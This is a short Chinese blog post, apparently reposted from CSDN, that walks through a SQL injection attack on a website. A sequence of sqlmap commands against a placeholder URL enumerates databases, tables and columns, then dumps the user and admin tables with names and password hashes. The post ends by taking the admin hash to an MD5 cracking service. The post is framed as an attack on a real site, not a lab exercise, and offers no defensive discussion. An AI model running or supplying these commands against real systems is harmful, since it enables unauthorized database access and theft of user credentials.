实战:某网站的SQL注入(php+mysql+Apache)

1.列出所有数据库
sqlmap -u “http://www.aaa.com/a.php?id=2” --dbs
在这里插入图片描述

2.列出数据库"hailc0218"的所有表
sqlmap -u “http://www.aaa.com/a.php?id=2” --tables -D"hailc0218"
在这里插入图片描述

3.列出数据库"hailc0218"表“user”的所有字段
sqlmap -u “http://www.aaa/a.php?id=2” --columns -T"user" -D"hailc0218"
在这里插入图片描述

4.列出数据库"hailc0218"表“user”的前20个“id”,“name”和“password”的数据
sqlmap -u “http://www.aaa.com/a.php?id=2” --dump -C"password,name,id" -T"user" -D"hailc0218" --start 1 --stop 20
在这里插入图片描述

5.列出数据库"hailc0218"表“admin”的所有字段
sqlmap -u “http://www.aaa.com/a.php?id=2” --columns -T"admin" -D"hailc0218"
在这里插入图片描述

6.列出数据库"hailc0218"表“admin”的所有数据
sqlmap -u “http://www.aaa.com/a.php?id=2” --dump -T"admin" -D"hailc0218"
在这里插入图片描述

7.发现admin账号的密码为0059xxxxxxxxxxxxxxx
拿去MD5解密
在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/anlalu233/article/details/105739467